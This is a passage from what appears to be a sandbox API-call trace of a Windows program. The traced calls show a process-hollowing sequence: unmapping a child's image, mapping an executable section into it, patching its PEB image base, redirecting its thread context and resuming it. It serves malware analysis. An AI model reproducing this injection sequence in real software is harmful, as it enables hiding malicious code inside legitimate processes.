[76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40aa50, Ebp=0x0, Eip=0x77d0aef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0069.863] ReadProcessMemory (in: hProcess=0x17c, lpBaseAddress=0x7ffde008, lpBuffer=0x190f94, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x190f94*, lpNumberOfBytesRead=0x0) returned 1 [0069.863] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b20 | out: Wow64Process=0x190b20) returned 1 [0069.866] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0069.866] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0069.866] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000 [0069.866] ReadFile (in: hFile=0x184, lpBuffer=0x1f10000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a58, lpOverlapped=0x0 | out: lpBuffer=0x1f10000*, lpNumberOfBytesRead=0x190a58*=0x176638, lpOverlapped=0x0) returned 1 [0069.903] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0069.933] CloseHandle (hObject=0x184) returned 1 [0069.933] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.941] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.948] NtUnmapViewOfSection (ProcessHandle=0x17c, BaseAddress=0x400000) returned 0x0 [0069.948] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190adc | out: Wow64Process=0x190adc) returned 1 [0069.951] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0069.952] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0069.952] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000 [0069.952] ReadFile (in: hFile=0x184, lpBuffer=0x1f10000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a14, lpOverlapped=0x0 | out: lpBuffer=0x1f10000*, lpNumberOfBytesRead=0x190a14*=0x176638, lpOverlapped=0x0) returned 1 [0069.977] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0070.004] CloseHandle (hObject=0x184) returned 1 [0070.004] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.011] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.019] NtCreateSection (in: SectionHandle=0x190b18, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x190f80, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x190b18*=0x184) returned 0x0 [0070.019] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190ab0 | out: Wow64Process=0x190ab0) returned 1 [0070.022] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0070.022] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0070.022] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000 [0070.023] ReadFile (in: hFile=0x180, lpBuffer=0x1f10000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x1909e8, lpOverlapped=0x0 | out: lpBuffer=0x1f10000*, lpNumberOfBytesRead=0x1909e8*=0x176638, lpOverlapped=0x0) returned 1 [0070.043] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0070.069] CloseHandle (hObject=0x180) returned 1 [0070.069] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.075] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.089] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x17c, BaseAddress=0x190b0c*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x190ab4*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x190b0c*=0x400000, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000) returned 0x0 [0070.090] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190ab0 | out: Wow64Process=0x190ab0) returned 1 [0070.097] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0070.097] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0070.097] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000 [0070.097] ReadFile (in: hFile=0x180, lpBuffer=0x1f10000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x1909e8, lpOverlapped=0x0 | out: lpBuffer=0x1f10000*, lpNumberOfBytesRead=0x1909e8*=0x176638, lpOverlapped=0x0) returned 1 [0070.118] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0070.144] CloseHandle (hObject=0x180) returned 1 [0070.144] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.151] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.158] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0xffffffffffffffff, BaseAddress=0x190b0c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x190b0c*=0x1f10000, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000) returned 0x0 [0070.164] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190af4 | out: Wow64Process=0x190af4) returned 1 [0070.167] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0070.167] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0070.167] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0070.167] ReadFile (in: hFile=0x180, lpBuffer=0x2100000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a2c, lpOverlapped=0x0 | out: lpBuffer=0x2100000*, lpNumberOfBytesRead=0x190a2c*=0x176638, lpOverlapped=0x0) returned 1 [0070.188] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000 [0070.231] CloseHandle (hObject=0x180) returned 1 [0070.231] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.238] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.243] NtWriteVirtualMemory (in: ProcessHandle=0x17c, BaseAddress=0x7ffde008, Buffer=0x190c90*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x190af8 | out: Buffer=0x190c90*, NumberOfBytesWritten=0x190af8*=0x4) returned 0x0 [0070.245] SetThreadContext (hThread=0x178, lpContext=0x190cb0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40168d, Ebp=0x0, Eip=0x77d0aef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0070.246] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b2c | out: Wow64Process=0x190b2c) returned 1 [0070.249] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0070.249] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0070.249] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0070.249] ReadFile (in: hFile=0x180, lpBuffer=0x2100000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a50, lpOverlapped=0x0 | out: lpBuffer=0x2100000*, lpNumberOfBytesRead=0x190a50*=0x176638, lpOverlapped=0x0) returned 1 [0070.271] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000 [0070.299] CloseHandle (hObject=0x180) returned 1 [0070.299] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.306] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.313] NtResumeThread (in: ThreadHandle=0x178, SuspendCount=0x190b30 | out: SuspendCount=0x190b30*=0x1) returned 0x0 [0070.438] CloseHandle (hObject=0x17c) returned 1 [0070.438] CloseHandle (hObject=0x178) returned 1 [0070.438] CloseHandle (hObject=0x184) returned 1 [0070.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b20 | out: Wow64Process=0x190b20) returned 1 [0070.442] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0070.442] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0070.442] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, 